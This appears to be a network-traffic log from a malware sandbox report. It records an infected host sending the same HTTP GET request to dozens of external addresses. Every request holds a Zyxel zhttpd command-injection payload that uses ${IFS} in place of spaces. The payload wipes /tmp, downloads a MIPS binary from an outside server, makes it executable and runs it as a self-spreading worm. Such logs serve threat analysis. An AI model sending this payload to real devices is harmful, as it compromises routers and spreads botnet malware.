                                                Jan 12, 2024 18:16:25.499965906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4946192.168.2.2340774138.39.99.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500016928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4947192.168.2.2355864146.253.33.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500051022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4948192.168.2.2350338153.71.201.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500111103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4949192.168.2.235871276.139.139.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500144005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4950192.168.2.2352952124.118.5.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500180006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4951192.168.2.2344024216.148.208.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500231028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4952192.168.2.23557684.202.17.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500262022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4953192.168.2.234830891.52.127.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500297070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4954192.168.2.235791262.29.50.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500320911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4955192.168.2.2349016194.3.142.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500371933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4956192.168.2.235658657.4.82.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500399113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4957192.168.2.234344849.172.4.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500426054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4958192.168.2.2351354141.253.101.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500447035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4959192.168.2.2358578176.113.102.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500499964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4960192.168.2.235870269.225.84.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500539064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4961192.168.2.2357436205.34.82.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500560999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4962192.168.2.2337914131.210.116.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500593901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4963192.168.2.2353494151.2.211.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500638962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4964192.168.2.235367052.248.253.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500688076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4965192.168.2.2359662108.217.10.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500735044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4966192.168.2.2339000119.238.103.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500758886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4967192.168.2.2350082175.38.185.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500802994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4968192.168.2.233854088.219.237.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500835896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4969192.168.2.233848427.195.172.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500870943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4970192.168.2.233798446.138.197.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500905037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4971192.168.2.2350460172.250.31.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500935078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4972192.168.2.234172644.147.112.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.500968933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4973192.168.2.234201878.118.84.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501018047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4974192.168.2.2350028217.210.91.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501060009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4975192.168.2.2332848175.176.153.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501099110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4976192.168.2.234662095.227.73.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501143932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4977192.168.2.2340812165.70.30.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501180887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4978192.168.2.234375444.86.243.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501221895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4979192.168.2.2349868212.188.134.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501245975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4980192.168.2.2357940207.252.16.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501297951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4981192.168.2.2341968165.173.143.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501348019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4982192.168.2.234970070.66.9.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501384020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4983192.168.2.2341756124.253.232.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501434088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4984192.168.2.2357650188.166.166.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501482964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4985192.168.2.2347116120.14.152.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501517057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4986192.168.2.234250617.52.102.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501565933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4987192.168.2.235213480.98.226.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501597881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4988192.168.2.2356556161.248.245.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501632929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4989192.168.2.2350394114.116.84.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501653910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4990192.168.2.234861282.220.1.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501699924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4991192.168.2.2359608218.53.76.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501730919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4992192.168.2.2348724139.5.7.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501780033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4993192.168.2.2350708142.221.153.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501826048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4994192.168.2.235264425.48.124.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501842022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4995192.168.2.2349660190.35.121.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501893997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4996192.168.2.235073658.81.56.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501940966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4997192.168.2.2333794120.196.217.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.501986027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4998192.168.2.235565240.136.39.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502012968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4999192.168.2.2348346152.17.81.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502057076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5000192.168.2.233285823.250.78.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502082109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5001192.168.2.2335044155.6.135.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502135038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5002192.168.2.2345140126.164.212.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502151966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5003192.168.2.2350488147.239.89.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502224922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5004192.168.2.2342006198.147.192.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502255917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5005192.168.2.235213466.101.223.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502284050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5006192.168.2.234248242.187.94.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502320051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5007192.168.2.2336020166.123.49.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.502348900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5008192.168.2.234098662.2.251.25443
                                                TimestampBytes transferredDirectionData
